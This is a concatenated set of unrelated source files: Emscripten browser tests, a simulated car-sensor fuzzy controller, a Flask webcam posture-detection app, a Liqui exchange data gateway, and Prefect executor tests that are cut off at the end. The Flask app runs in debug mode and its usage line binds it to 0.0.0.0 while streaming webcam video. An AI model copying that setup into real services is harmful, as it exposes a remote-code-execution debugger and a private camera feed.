      Settings.ASM_JS = 1
      self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js')

    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1'])

  def test_tex_nonbyte(self):
    self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1'])

  def test_float_tex(self):
    self.btest('float_tex.cpp', reference='float_tex.png')

  def test_subdata(self):
    self.btest('gl_subdata.cpp', reference='float_tex.png')

  def test_perspective(self):
    self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1'])
  def test_runtimelink(self):
    # Permanently skipped; the code below it is dead but kept for reference.
    return self.skip('BUILD_AS_SHARED_LIB=2 is deprecated')
    main, supp = self.setup_runtimelink_test()

    open(self.in_dir('supp.cpp'), 'w').write(supp)
    Popen([PYTHON, EMCC, self.in_dir('supp.cpp'), '-o', 'supp.js', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'BUILD_AS_SHARED_LIB=2', '-O2', '-s', 'ASM_JS=0']).communicate()
    shutil.move(self.in_dir('supp.js'), self.in_dir('supp.so'))

    self.btest(main, args=['-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'RUNTIME_LINKED_LIBS=["supp.so"]', '-DBROWSER=1', '-O2', '-s', 'ASM_JS=0'], expected='76')

  def test_pre_run_deps(self):
    # Adding a dependency in preRun will delay run
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
      Module.preRun = function() {
        addRunDependency();
        Module.print('preRun called, added a dependency...');
        setTimeout(function() {
          Module.okk = 10;
          removeRunDependency()
        }, 2000);
      };
    ''')
    # Run with and without a memory init file.
    for mem in [0, 1]:
      self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])

  def test_worker_api(self):
    Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
    self.btest('worker_api_main.cpp', expected='566')

  def test_worker_api_2(self):
    Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
    self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')

  def test_emscripten_async_wget2(self):
    self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])

  def test_module(self):
    Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
    self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')

  def test_mmap_file(self):
    open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
    for extra_args in [[], ['--no-heap-copy']]:
      self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
# --- soal1.py ---
from fuzzy import command
from multiprocessing import Process,Pipe
import random
import time
def SensorDepan(depan):
    """Simulate the front distance sensor: send one random reading (cm) down the pipe."""
    distance = random.randrange(1, 100)
    depan.send(distance)
    print('Jarak depan mobil : ', distance, ' cm')
    depan.close()
def SensorBelakang(belakang):
    """Simulate the rear distance sensor: send one random reading (cm) down the pipe."""
    distance = random.randrange(1, 100)
    belakang.send(distance)
    print('Jarak belakang mobil : ', distance, ' cm')
    belakang.close()
def SensorKiri(kiri):
    """Simulate the left distance sensor: send one random reading (cm) down the pipe.

    Fix: the original declared ``global Jkiri``. This function runs in a child
    process (see the ``__main__`` block), so assigning a module global here
    can never be observed by the parent — the declaration was misleading and
    has been removed; ``Jkiri`` is now a plain local.
    """
    Jkiri = random.randrange(1, 100)
    kiri.send(Jkiri)
    print('Jarak kiri mobil : ', Jkiri, ' cm')
    kiri.close()
def SensorKanan(kanan):
    """Simulate the right distance sensor: send one random reading (cm) down the pipe."""
    distance = random.randrange(1, 100)
    kanan.send(distance)
    print('Jarak kanan mobil : ', distance, ' cm')
    kanan.close()
def SensorTraffic(traffic):
    """Simulate the traffic light: send a random colour ('merah'/'kuning'/'hijau').

    Fix: the original named its local ``list``, shadowing the builtin;
    renamed to ``colours`` (behaviour unchanged).
    """
    colours = ['merah', 'kuning', 'hijau']
    lampu = random.choice(colours)
    traffic.send(lampu)
    print('Lampu traffic sedang : ', lampu)
    traffic.close()
def Controller(depan, belakang, kiri, kanan, lampu):
    """Collect one reading from each sensor pipe (in fixed order) and feed
    them to the fuzzy ``command`` controller."""
    readings = [conn.recv() for conn in (depan, belakang, kiri, kanan, lampu)]
    print('--- Tindakan ---')
    command(*readings)
if __name__ == '__main__':
    # Fix: the original's last line carried a stray trailing ' |' extraction
    # artifact after time.sleep(1), which is a syntax error; it was removed.
    # Every second: create one Pipe per sensor, spawn the five sensor
    # processes plus the controller, and wait for all of them to finish.
    while (1):
        depanIn, depanOut = Pipe()
        belakangIn, belakangOut = Pipe()
        kiriIn, kiriOut = Pipe()
        kananIn, kananOut = Pipe()
        lampuIn, lampuOut = Pipe()
        KirimSensorDepan = Process(target=SensorDepan, args=(depanIn,))
        KirimSensorBelakang = Process(target=SensorBelakang, args=(belakangIn,))
        KirimSensorKiri = Process(target=SensorKiri, args=(kiriIn,))
        KirimSensorKanan = Process(target=SensorKanan, args=(kananIn,))
        KirimLampu = Process(target=SensorTraffic, args=(lampuIn,))
        ControllerUtama = Process(target=Controller, args=(depanOut, belakangOut, kiriOut, kananOut, lampuOut))
        KirimLampu.start()
        KirimSensorDepan.start()
        KirimSensorBelakang.start()
        KirimSensorKiri.start()
        KirimSensorKanan.start()
        ControllerUtama.start()
        KirimLampu.join()
        KirimSensorDepan.join()
        KirimSensorBelakang.join()
        KirimSensorKiri.join()
        KirimSensorKanan.join()
        ControllerUtama.join()
        time.sleep(1)
# --- trash.py ---
# USAGE
# python webstreaming.py --ip 0.0.0.0 --port 8000
# source venv/bin/activate
# import the necessary packages
from pyimagesearch.motion_detection import SingleMotionDetector
from imutils.video import VideoStream
from flask import Response
from flask import Flask
from flask import render_template
import threading
import argparse
import datetime
import imutils
import time
import cv2
import math
import numpy as np
import util
from config_reader import config_reader
from scipy.ndimage.filters import gaussian_filter
from model import get_testing_model
# Frame shared between the capture thread and the streaming response,
# guarded by `lock`.
outputFrame = None
lock = threading.Lock()

# initialize a flask object
app = Flask(__name__)

# vs = VideoStream(src=0).start()
# NOTE(review): sleeps at import time; presumably a camera warm-up delay for
# the commented-out VideoStream above — confirm whether it is still needed.
time.sleep(2.0)
tic=0
# visualize
# One BGR colour per keypoint/limb used when drawing pose estimation output.
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0],
          [0, 255, 0], \
          [0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255],
          [85, 0, 255], \
          [170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85]]

#[start]yerin
# Slot 0: overall verdict; 1: arm state; 2: kneel state; 3: back state.
states = list(range(4)) #good posture, arm, kneel, back
#[end]yerin
@app.route("/")
def index():
    # Refresh the global `states` list from the on-disk sensor state files,
    # then render the dashboard with the current values.
    load_state()
    # return the rendered template
    return render_template("index.html", states=states)
#[start]yerin
def load_state():
    """Refresh the global posture ``states`` list from the sensor state files.

    Reads armstate.txt / kneelstate.txt / backstate.txt into states[1..3] and
    derives the overall verdict in states[0]. Returns 0 (kept for
    compatibility with the original).

    Fix: the original wrote ``file.close`` (no parentheses) three times, so
    no file was ever closed — and ``file`` shadowed a builtin. Replaced with
    ``with open(...)`` blocks, which guarantee closure.
    """
    states[0] = "posture"
    with open("armstate.txt", "r") as f:
        states[1] = f.read()
    with open("kneelstate.txt", "r") as f:
        states[2] = f.read()
    with open("backstate.txt", "r") as f:
        states[3] = f.read()
    if(states[1]=="Not Folding Hands" and states[2]=="Not kneeling" and states[3]=="Straight"):
        states[0]="good posture"
    elif(states[1]=="Folding Hands" or states[2]=="kneeling" or states[3]=="Hunchback" or states[3]=="Reclined"):
        states[0]="bad posture"
    else:
        states[0]="Not detected"
    return 0
#[end]yerin
def detect_motion():
    """Capture webcam frames, run pose estimation, publish annotated frames.

    Runs forever in a background thread: each frame is fed through the
    keras pose model, detected keypoints are drawn onto the frame, the
    posture checks persist their verdicts to the state files, and the
    annotated frame is published via the global ``outputFrame`` for the
    MJPEG stream.
    """
    global outputFrame, lock
    cap = cv2.VideoCapture(0)
    # NOTE(review): 100/200 are not valid cv2.CAP_PROP_* ids; these two
    # calls presumably intended CAP_PROP_FRAME_WIDTH/HEIGHT -- confirm.
    cap.set(100, 160)
    cap.set(200, 120)
    # loop over frames from the video stream
    while True:
        ret, frame = cap.read()
        #test
        frame = imutils.resize(frame, width=800)
        #
        params, model_params = config_reader()
        oriImg = frame  # B,G,R order
        multiplier = [x * model_params['boxsize'] / oriImg.shape[0] for x in params['scale_search']]
        # Accumulators for the heatmap / PAF averages (19 / 38 channels).
        heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19))
        paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38))
        # Only the first scale is used (range(1)) even though multiplier
        # lists several -- a deliberate speed shortcut, apparently.
        for m in range(1):
            scale = multiplier[0]
            imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
            imageToTest_padded, pad = util.padRightDownCorner(imageToTest, model_params['stride'],
                                                              model_params['padValue'])
            input_img = np.transpose(np.float32(imageToTest_padded[:, :, :, np.newaxis]), (3, 0, 1, 2))  # required shape (1, width, height, channels)
            output_blobs = model.predict(input_img)
            heatmap = np.squeeze(output_blobs[1])  # output 1 is heatmaps
            heatmap = cv2.resize(heatmap, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
                                 interpolation=cv2.INTER_CUBIC)
            heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
            heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
            paf = np.squeeze(output_blobs[0])  # output 0 is PAFs
            paf = cv2.resize(paf, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
                             interpolation=cv2.INTER_CUBIC)
            paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
            paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
            heatmap_avg = heatmap_avg + heatmap / len(multiplier)
            paf_avg = paf_avg + paf / len(multiplier)
        all_peaks = []  # To store all the key points which are detected.
        peak_counter = 0
        # prinfTick(1) #prints time required till now.
        for part in range(18):
            map_ori = heatmap_avg[:, :, part]
            map = gaussian_filter(map_ori, sigma=3)
            # Local-maximum test: a pixel is a peak when it is >= each of its
            # four neighbours and above confidence threshold thre1.
            map_left = np.zeros(map.shape)
            map_left[1:, :] = map[:-1, :]
            map_right = np.zeros(map.shape)
            map_right[:-1, :] = map[1:, :]
            map_up = np.zeros(map.shape)
            map_up[:, 1:] = map[:, :-1]
            map_down = np.zeros(map.shape)
            map_down[:, :-1] = map[:, 1:]
            peaks_binary = np.logical_and.reduce(
                (map >= map_left, map >= map_right, map >= map_up, map >= map_down, map > params['thre1']))
            peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0]))  # note reverse
            peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks]
            id = range(peak_counter, peak_counter + len(peaks))
            peaks_with_score_and_id = [peaks_with_score[i] + (id[i],) for i in range(len(id))]
            all_peaks.append(peaks_with_score_and_id)
            peak_counter += len(peaks)
        connection_all = []
        special_k = []
        mid_num = 10
        # prinfTick(2) #prints time required till now.
        canvas = frame  # B,G,R order
        for i in range(18):  # drawing all the detected key points.
            for j in range(len(all_peaks[i])):
                cv2.circle(canvas, all_peaks[i][j][0:2], 4, colors[i], thickness=-1)
        print()
        position = checkPosition(all_peaks)
        checkKneeling(all_peaks)
        checkHandFold(all_peaks)
        print()
        print()
        # Publish the annotated frame for the MJPEG generator.
        with lock:
            outputFrame = canvas.copy()
    # Unreachable (the loop never breaks), kept for documentation purposes.
    cap.release()
def checkPosition(all_peaks):
    """Classify back posture from a lateral view and persist the verdict.

    Uses the ear (right if visible, else left) and hip keypoints to compute
    the torso angle, then writes the verdict to ``backstate.txt``.

    :param all_peaks: per-keypoint list of detected peaks (COCO-18 order).
    :return: 1 for hunchback, -1 for reclined, 0 for straight, and None
        when the required keypoints are missing.
    """
    #[start]yerin
    # BUG FIX: use a context manager so the file is closed even if the
    # keypoint lookups raise (the original could leak the handle).
    with open("backstate.txt", "w") as file:
        #[end]yerin
        try:
            f = 0
            if (all_peaks[16]):
                a = all_peaks[16][0][0:2]  # Right Ear
                f = 1
            else:
                a = all_peaks[17][0][0:2]  # Left Ear
            b = all_peaks[11][0][0:2]  # Hip
            angle = calcAngle(a, b)
            degrees = round(math.degrees(angle))
            if (f):
                # Mirror the angle when measured from the right side.
                degrees = 180 - degrees
            if (degrees < 70):
                file.write("Hunchback")
                print("Hunchback")
                return 1
            elif (degrees > 110):
                file.write("Reclined")
                print("Reclined")
                return -1
            else:
                file.write("Straight")
                print("Straight")
                return 0
        except Exception as e:
            file.write("person not in lateral view and unable to detect ears or hip")
            print("person not in lateral view and unable to detect ears or hip")
def calcAngle(a, b):
    """Return the direction angle, in radians, of the vector a -> b.

    A perfectly vertical segment returns the fixed constant 1.570796
    (~pi/2).  If the points cannot be unpacked, a message is printed and
    None is returned (best-effort contract of the original).
    """
    try:
        start_x, start_y = a
        end_x, end_y = b
        # Degenerate vertical case keeps the original hard-coded constant.
        return 1.570796 if start_x == end_x else math.atan2(end_y - start_y, end_x - start_x)
    except Exception:
        print("unable to calculate angle")
def checkHandFold(all_peaks):
    """Detect folded arms from the detected keypoints and persist the verdict.

    Compares elbow->wrist distance with shoulder->elbow distance (right arm
    first, falling back to the left arm) and writes the result to
    ``armstate.txt``.
    """
    #[start]yerin
    # BUG FIX: the original opened armstate.txt and never closed it; the
    # context manager guarantees the handle is released on every path.
    with open("armstate.txt", "w") as file:
        #[end]yerin
        try:
            if (all_peaks[3][0][0:2]):
                try:
                    if (all_peaks[4][0][0:2]):
                        distance = calcDistance(all_peaks[3][0][0:2], all_peaks[4][0][0:2])  # distance between right arm-joint and right palm.
                        armdist = calcDistance(all_peaks[2][0][0:2], all_peaks[3][0][0:2])  # distance between left arm-joint and left palm.
                        # this value 100 is arbitary. this shall be replaced with a
                        # calculation which can adjust to different sizes of people.
                        if (distance < (armdist + 100) and distance > (armdist - 100)):
                            print("Not Folding Hands")
                            file.write("Not Folding Hands")
                        else:
                            print("Folding Hands")
                            file.write("Folding Hands")
                except Exception as e:
                    # Wrist missing while elbow visible: treated as folded.
                    print("Folding Hands")
                    file.write("Folding Hands")
        except Exception as e:
            # Right arm not detected; retry with the left-arm keypoints.
            try:
                if (all_peaks[7][0][0:2]):
                    distance = calcDistance(all_peaks[6][0][0:2], all_peaks[7][0][0:2])
                    armdist = calcDistance(all_peaks[6][0][0:2], all_peaks[5][0][0:2])
                    if (distance < (armdist + 100) and distance > (armdist - 100)):
                        print("Not Folding Hands")
                        file.write("Not Folding Hands")
                    else:
                        print("Folding Hands")
                        file.write("Folding Hands")
            except Exception as e:
                print("Unable to detect arm joints")
                file.write("Unable to detect arm joints")
def calcDistance(a, b):  # calculate distance between two points.
    """Return the Euclidean distance between points *a* and *b*.

    Prints a message and returns None when either point cannot be unpacked.
    """
    try:
        ax, ay = a
        bx, by = b
        return math.hypot(bx - ax, by - ay)
    except Exception:
        print("unable to calculate distance")
def checkKneeling(all_peaks):
    """Detect kneeling from hip/ankle keypoints and persist the verdict.

    Measures the hip->ankle angle for each detected leg and writes the
    classification to ``kneelstate.txt``.
    """
    #[start]yerin
    # BUG FIX: the original opened kneelstate.txt and never closed it; the
    # context manager guarantees the handle is released on every path.
    with open("kneelstate.txt", "w") as file:
        #[end]yerin
        f = 0
        if (all_peaks[16]):
            # Right ear visible -> subject faces right; no angle mirroring.
            f = 1
        try:
            if (all_peaks[10][0][0:2] and all_peaks[13][0][0:2]):
                rightankle = all_peaks[10][0][0:2]
                leftankle = all_peaks[13][0][0:2]
                hip = all_peaks[11][0][0:2]
                leftangle = calcAngle(hip, leftankle)
                leftdegrees = round(math.degrees(leftangle))
                rightangle = calcAngle(hip, rightankle)
                rightdegrees = round(math.degrees(rightangle))
                if (f == 0):
                    leftdegrees = 180 - leftdegrees
                    rightdegrees = 180 - rightdegrees
                # 60 degrees is trail and error value here. We can tweak this
                # accordingly and results will vary.
                if (leftdegrees > 60 and rightdegrees > 60):
                    print("Both Legs are in Kneeling")
                    file.write("kneeling")
                elif (rightdegrees > 60):
                    print("kneeling")
                    file.write("Right leg is kneeling")
                elif (leftdegrees > 60):
                    print("Left leg is kneeling")
                    file.write("kneeling")
                else:
                    print("Not kneeling")
                    file.write("Not kneeling")
        except IndexError as e:
            # Only one leg detected: fall back to a single hip->ankle angle.
            try:
                if (f):
                    a = all_peaks[10][0][0:2]  # if only one leg (right leg) is detected
                else:
                    a = all_peaks[13][0][0:2]  # if only one leg (left leg) is detected
                b = all_peaks[11][0][0:2]  # location of hip
                angle = calcAngle(b, a)
                degrees = round(math.degrees(angle))
                if (f == 0):
                    degrees = 180 - degrees
                if (degrees > 60):
                    print("Both Legs Kneeling")
                    file.write("kneeling")
                else:
                    print("Not Kneeling")
                    file.write("Not kneeling")
            except Exception as e:
                print("legs not detected")
                file.write("legs not detected")
def generate():
    """Yield the shared annotated frame as an MJPEG multipart stream, forever."""
    # grab global references to the output frame and lock variables
    global outputFrame, lock
    # loop over frames from the output stream
    while True:
        with lock:
            # Nothing published yet: spin until the worker produces a frame.
            if outputFrame is None:
                continue
            # encode the frame in JPEG format
            (flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
            # skip frames that failed to encode
            if not flag:
                continue
        yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + bytearray(encodedImage) + b'\r\n')
@app.route("/video_feed")
def video_feed():
    """Stream the annotated frames as a multipart MJPEG HTTP response."""
    # return the response generated along with the specific media
    # type (mime type)
    return Response(generate(), mimetype="multipart/x-mixed-replace; boundary=frame")
# check to see if this is the main thread of execution
if __name__ == '__main__':
    # construct the argument parser and parse command line arguments
    ap = argparse.ArgumentParser()
    ap.add_argument("-i", "--ip", type=str, required=True,
                    help="ip address of the device")
    ap.add_argument("-o", "--port", type=int, required=True,
                    help="ephemeral port number of the server (1024 to 65535)")
    ap.add_argument("-f", "--frame-count", type=int, default=32,
                    help="# of frames used to construct the background model")
    args = vars(ap.parse_args())
    # Load the pose-estimation network once, before the worker thread starts.
    model = get_testing_model()
    model.load_weights('./model/keras/model.h5')
    # while(1):
    #     ret,frame=cap.read()
    #     params, model_params = config_reader()
    #     canvas = detect_motion(frame, params, model_params)
    #     cv2.imshow("capture",canvas)
    #     if cv2.waitKey(1) & 0xFF==ord('q'):
    #         break
    # cap.release()
    # start a thread that will perform motion detection
    t = threading.Thread(target=detect_motion)
    t.daemon = True
    t.start()
    # start the flask app
    app.run(host=args["ip"], port=args["port"], debug=True,
            threaded=True, use_reloader=False)
# release the video stream pointer
# vs.stop()
liqui.py | from restful_api_socket import RESTfulApiSocket
from exchanges.gateway import ExchangeGateway
from market_data import L2Depth, Trade
from util import Logger
from instrument import Instrument
from clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from threading import Thread
import time
class ExchGwApiLiqui(RESTfulApiSocket):
    """
    Exchange gateway RESTfulApi

    Field-name accessors plus parsers that turn Liqui's public REST
    order-book/trade payloads into L2Depth and Trade objects.
    """
    def __init__(self):
        RESTfulApiSocket.__init__(self)

    @classmethod
    def get_timestamp_offset(cls):
        # Divisor applied to raw trade timestamps; 1 => already in seconds.
        return 1

    @classmethod
    def get_trades_timestamp_field_name(cls):
        return 'timestamp'

    @classmethod
    def get_bids_field_name(cls):
        return 'bids'

    @classmethod
    def get_asks_field_name(cls):
        return 'asks'

    @classmethod
    def get_trade_side_field_name(cls):
        return 'type'

    @classmethod
    def get_trade_id_field_name(cls):
        return 'tid'

    @classmethod
    def get_trade_price_field_name(cls):
        return 'price'

    @classmethod
    def get_trade_volume_field_name(cls):
        return 'amount'

    @classmethod
    def get_order_book_link(cls, instmt):
        # Liqui public API v3 depth endpoint for the instrument code.
        return "https://api.liqui.io/api/3/depth/{0}".format(
            instmt.get_instmt_code())

    @classmethod
    def get_trades_link(cls, instmt):
        # Latest 20 trades for the instrument code.
        return "https://api.liqui.io/api/3/trades/{0}?limit=20".format(
            (instmt.get_instmt_code()))

    @classmethod
    def parse_l2_depth(cls, instmt, raw):
        """
        Parse raw data to L2 depth
        :param instmt: Instrument
        :param raw: Raw data in JSON
        """
        l2_depth = L2Depth()
        # The payload is keyed by instrument code, e.g. {'eth_btc': {...}}.
        raw = raw[instmt.instmt_code]
        keys = list(raw.keys())
        if (cls.get_bids_field_name() in keys and
                cls.get_asks_field_name() in keys):
            # Date time
            l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
            # Bids -- keep the top five levels, coercing to float as needed.
            bids = raw[cls.get_bids_field_name()]
            for i in range(0, 5):
                l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
                l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
            # Asks
            asks = raw[cls.get_asks_field_name()]
            for i in range(0, 5):
                l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
                l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
        else:
            raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
                (instmt.get_exchange_name(), instmt.get_instmt_name(), \
                 raw))
        return l2_depth

    @classmethod
    def parse_trade(cls, instmt, raw):
        """
        Parse a single raw trade record into a Trade object.
        :param instmt: Instrument
        :param raw: Raw data in JSON
        :return:
        """
        trade = Trade()
        keys = list(raw.keys())
        if cls.get_trades_timestamp_field_name() in keys and \
           cls.get_trade_id_field_name() in keys and \
           cls.get_trade_price_field_name() in keys and \
           cls.get_trade_volume_field_name() in keys:
            # Date time
            date_time = float(raw[cls.get_trades_timestamp_field_name()])
            date_time = date_time / cls.get_timestamp_offset()
            trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
            # Trade side
            # NOTE(review): hard-coded to 1 -- the 'type' field from the feed
            # is never consulted; confirm whether this is intentional.
            trade.trade_side = 1
            # Trade id
            trade.trade_id = str(raw[cls.get_trade_id_field_name()])
            # Trade price
            trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
            # Trade volume
            trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
        else:
            raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
                (instmt.get_exchange_name(), instmt.get_instmt_name(), \
                 raw))
        return trade

    @classmethod
    def get_order_book(cls, instmt):
        """
        Get order book
        :param instmt: Instrument
        :return: Object L2Depth
        """
        res = cls.request(cls.get_order_book_link(instmt))
        if len(res) > 0:
            return cls.parse_l2_depth(instmt=instmt,
                                      raw=res)
        else:
            return None

    @classmethod
    def get_trades(cls, instmt):
        """
        Get trades
        :param instmt: Instrument
        :param trade_id: Trade id
        :return: List of trades
        """
        link = cls.get_trades_link(instmt)
        res = cls.request(link)
        trades = []
        if len(res) > 0:
            res = res[instmt.instmt_code]
            # The feed returns newest first; iterate in reverse so trades are
            # appended oldest-to-newest.
            for i in range(0, len(res)):
                t = res[len(res) - 1 - i]
                trade = cls.parse_trade(instmt=instmt,
                                        raw=t)
                trades.append(trade)
        return trades
class ExchGwLiqui(ExchangeGateway):
    """
    Exchange gateway

    Polls the Liqui REST API for order-book snapshots and trades and
    persists them through the configured database clients.
    """
    def __init__(self, db_clients):
        """
        Constructor
        :param db_client: Database client
        """
        ExchangeGateway.__init__(self, ExchGwApiLiqui(), db_clients)

    @classmethod
    def get_exchange_name(cls):
        """
        Get exchange name
        :return: Exchange name string
        """
        return 'Liqui'

    def get_order_book_worker(self, instmt):
        """
        Get order book worker
        :param instmt: Instrument
        """
        while True:
            try:
                l2_depth = self.api_socket.get_order_book(instmt)
                # Persist only when the book actually changed since last poll.
                if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
                    instmt.set_prev_l2_depth(instmt.get_l2_depth())
                    instmt.set_l2_depth(l2_depth)
                    instmt.incr_order_book_id()
                    self.insert_order_book(instmt)
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
            time.sleep(1)

    def get_trades_worker(self, instmt):
        """
        Get trades worker thread
        :param instmt: Instrument name
        """
        while True:
            try:
                ret = self.api_socket.get_trades(instmt)
                if ret is None or len(ret) == 0:
                    time.sleep(1)
                    continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                # BUG FIX: `ret` is unbound (first iteration) or stale when
                # get_trades raises; retry the poll instead of falling
                # through to the processing loop below.
                time.sleep(1)
                continue
            for trade in ret:
                assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
                assert isinstance(instmt.get_exch_trade_id(), str), \
                    "instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
                # Only persist trades newer than the last one seen.
                if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
                    instmt.set_exch_trade_id(trade.trade_id)
                    instmt.incr_trade_id()
                    self.insert_trade(instmt, trade)
            # After the first time of getting the trade, indicate the instrument
            # is recovered
            if not instmt.get_recovered():
                instmt.set_recovered(True)
            time.sleep(1)

    def start(self, instmt):
        """
        Start the exchange gateway
        :param instmt: Instrument
        :return List of threads
        """
        instmt.set_l2_depth(L2Depth(5))
        instmt.set_prev_l2_depth(L2Depth(5))
        instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
                                                                                 instmt.get_instmt_name()))
        self.init_instmt_snapshot_table(instmt)
        instmt.set_recovered(False)
        t1 = Thread(target=partial(self.get_order_book_worker, instmt))
        t2 = Thread(target=partial(self.get_trades_worker, instmt))
        t1.start()
        t2.start()
        return [t1, t2]
if __name__ == '__main__':
    # Ad-hoc smoke test: poll Liqui's ETH/BTC trades forever and store them
    # through the SQL template client (blocks; never returns).
    Logger.init_log()
    exchange_name = 'Liqui'
    instmt_name = 'ETHBTC'
    instmt_code = 'eth_btc'
    instmt = Instrument(exchange_name, instmt_name, instmt_code)
    db_client = SqlClientTemplate()
    exch = ExchGwLiqui([db_client])
    instmt.set_l2_depth(L2Depth(5))
    instmt.set_prev_l2_depth(L2Depth(5))
    instmt.set_recovered(False)
    # exch.get_order_book_worker(instmt)
    exch.get_trades_worker(instmt)
|
test_executors.py | import multiprocessing
import time
from datetime import timedelta
from unittest.mock import MagicMock
import pytest
import prefect
from prefect.utilities.executors import (
Heartbeat,
main_thread_timeout,
multiprocessing_timeout,
)
def test_heartbeat_calls_function_on_interval():
    """Heartbeat must invoke its callback once per interval until cancelled."""
    class A:
        def __init__(self):
            self.called = 0  # number of times the heartbeat fired

        def __call__(self):
            self.called += 1

    a = A()
    # 0.09s interval inside a 0.2s window -> expect exactly two ticks.
    # NOTE(review): timing-based; may flake on a heavily loaded machine.
    timer = Heartbeat(0.09, a)
    timer.start()
    time.sleep(0.2)
    timer.cancel()
    assert a.called == 2
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_times_out(handler):
    """A function exceeding the timeout must raise TimeoutError."""
    slow_fn = lambda: time.sleep(2)
    with pytest.raises(TimeoutError):
        handler(slow_fn, timeout=1)
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_passes_args_and_kwargs_and_returns(handler):
    """Positional/keyword args must reach the wrapped fn; its result must return."""
    def do_nothing(x, y=None):
        return x, y

    assert handler(do_nothing, 5, timeout=1, y="yellow") == (5, "yellow")
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_doesnt_swallow_bad_args(handler):
    """Signature errors must surface as TypeError, not be masked by the handler."""
    def do_nothing(x, y=None):
        return x, y

    # missing required positional argument
    with pytest.raises(TypeError):
        handler(do_nothing, timeout=1)
    # unexpected keyword argument
    with pytest.raises(TypeError):
        handler(do_nothing, 5, timeout=1, z=10)
    # valid keyword plus an unexpected one
    with pytest.raises(TypeError):
        handler(do_nothing, 5, timeout=1, y="s", z=10)
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
def test_timeout_handler_reraises(handler):
    """Exceptions raised by the wrapped function must propagate unchanged."""
    def do_something():
        raise ValueError("test")

    with pytest.raises(ValueError) as exc:
        handler(do_something, timeout=1)
    # BUG FIX: `"test" in exc` performed membership on the ExceptionInfo
    # object itself (TypeError on modern pytest); check the message instead.
    assert "test" in str(exc.value)
@pytest.mark.parametrize("handler", [multiprocessing_timeout, main_thread_timeout])
